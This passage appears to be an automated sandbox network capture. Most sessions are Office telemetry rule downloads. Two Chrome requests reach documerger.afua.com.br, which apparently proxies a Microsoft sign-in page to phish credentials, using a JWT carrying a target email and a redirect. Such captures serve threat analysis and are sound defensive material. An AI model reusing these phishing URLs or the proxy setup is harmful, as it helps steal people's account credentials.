                                                  x-azure-ref: 20241127T170949Z-174f7845968zgtf6hC1EWRqd8s0000000q5000000000fb8h
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:49 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  39192.168.2.64975513.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:49 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:49 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:49 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 486
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                  ETag: "0x8DC582B92FCB436"
                                                  x-ms-request-id: fac497c4-501e-008f-4391-3f9054000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170949Z-174f7845968cpnpfhC1EWR3afc0000000wrg00000000ryu9
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:49 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  40192.168.2.64975413.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:49 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:50 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:49 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 427
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                  ETag: "0x8DC582BA909FA21"
                                                  x-ms-request-id: 5810d2d2-301e-0000-6891-3feecc000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170949Z-174f7845968j6t2phC1EWRcfe80000000xfg0000000011hw
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:50 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  41192.168.2.64975613.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:49 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:50 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:49 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 423
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                  ETag: "0x8DC582BB7564CE8"
                                                  x-ms-request-id: dc0e6055-901e-005b-2d91-3f2005000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170949Z-174f78459685726chC1EWRsnbg0000000x6000000000qpn7
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:50 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  42192.168.2.64975794.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:50 UTC1010OUTGET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2RvY3VtZXJnZXIuYWZ1YS5jb20uYnIvIiwiZG9tYWluIjoiZG9jdW1lcmdlci5hZnVhLmNvbS5iciIsImtleSI6Imt1SkZ5Q3YyeWt0VCIsInFyYyI6InU5czdvb0B2bHh3cnhhLm9yZyIsImlhdCI6MTczMjcyNzM4OCwiZXhwIjoxNzMyNzI3NTA4fQ.3Glfdu1-h4hcJLG6frjQG7LUrGE0ClWKXeH5CYKR-jk HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  Upgrade-Insecure-Requests: 1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: navigate
                                                  Sec-Fetch-User: ?1
                                                  Sec-Fetch-Dest: document
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  sec-ch-ua-platform: "Windows"
                                                  Referer: https://adrianocarreira.com/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-11-27 17:09:51 UTC314INHTTP/1.1 302 Found
                                                  Set-Cookie: qPdM=kuJFyCv2yktT; path=/; samesite=none; secure; httponly
                                                  Set-Cookie: qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; path=/; samesite=none; secure; httponly
                                                  location: /?auth=2&qrc=u9s7oo%40vlxwrxa.org
                                                  Date: Wed, 27 Nov 2024 17:09:51 GMT
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2024-11-27 17:09:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  43192.168.2.64975813.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:51 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:52 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:51 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 478
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                  ETag: "0x8DC582B9B233827"
                                                  x-ms-request-id: 1fa1b817-401e-0067-5691-3f09c2000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170951Z-174f7845968xr5c2hC1EWRd0hn0000000e50000000003n8t
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:52 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  44192.168.2.64976113.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:51 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:52 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:52 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 400
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                  ETag: "0x8DC582BB2D62837"
                                                  x-ms-request-id: 6760f0bc-801e-002a-1f91-3f31dc000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170952Z-174f7845968cpnpfhC1EWR3afc0000000wtg00000000h82p
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:52 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  45192.168.2.64976013.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:51 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:52 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:52 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 468
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                  ETag: "0x8DC582BB046B576"
                                                  x-ms-request-id: be7987d0-001e-0034-1e91-3fdd04000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170952Z-174f7845968l4kp6hC1EWRe8840000000xgg000000007mwq
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:52 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  46192.168.2.64975913.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:51 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:52 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:52 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 404
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                  ETag: "0x8DC582B95C61A3C"
                                                  x-ms-request-id: e52ede4a-001e-0017-0591-3f0c3c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170952Z-174f7845968zgtf6hC1EWRqd8s0000000q90000000001075
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:52 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  47192.168.2.64976213.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:52 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:52 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:52 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 479
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                  ETag: "0x8DC582BB7D702D0"
                                                  x-ms-request-id: 8dfbf447-101e-0028-0f8e-3f8f64000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170952Z-174f7845968px8v7hC1EWR08ng0000000xb000000000x6n4
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:52 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  48192.168.2.64976394.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:52 UTC807OUTGET /?auth=2&qrc=u9s7oo%40vlxwrxa.org HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  Upgrade-Insecure-Requests: 1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: navigate
                                                  Sec-Fetch-User: ?1
                                                  Sec-Fetch-Dest: document
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  sec-ch-ua-platform: "Windows"
                                                  Referer: https://adrianocarreira.com/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0
                                                  2024-11-27 17:09:53 UTC2735INHTTP/1.1 200 OK
                                                  Cache-Control: no-store, no-cache
                                                  Pragma: no-cache
                                                  Content-Type: text/html; charset=utf-8
                                                  Expires: -1
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                  P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                  x-ms-request-id: 89339bd4-db54-4dd6-9843-adacc696bc00
                                                  x-ms-ests-server: 2.1.19492.3 - WEULR1 ProdSlices
                                                  nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                  x-ms-srs: 1.P
                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                  Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-5-2DVuQIBSymCyvRIiXG3w' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net 'report-sample'; img-src 'self' data: https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                  Set-Cookie: esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; domain=documerger.afua.com.br; path=/; secure; HttpOnly; SameSite=None
                                                  Set-Cookie: fpc=AnIF4PXDa21Bo9TCi_D-hPs; expires=Fri, 27-Dec-2024 17:09:53 GMT; path=/; secure; HttpOnly; SameSite=None
                                                  Set-Cookie: esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe7J4HPqsUPUXeIg8xCHy7AUYYf1vFY6GCdCahZOs6ygrPOyD3SHcgG_JImwTwreMOcgA7MQdgG93ndMEop1y59oouDjj40cA28NUeMt0oDNLolNTeo4P7Rvgm7uW2XxPC9raSVwXLR8KtjVRbIKpVa6-wzvAk-1BMnzg_e-CtabAgAA; domain=documerger.afua.com.br; path=/; secure; HttpOnly; SameSite=None
                                                  Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                  Set-Cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly
                                                  Date: Wed, 27 Nov 2024 17:09:52 GMT
                                                  Connection: close
                                                  content-length: 20815
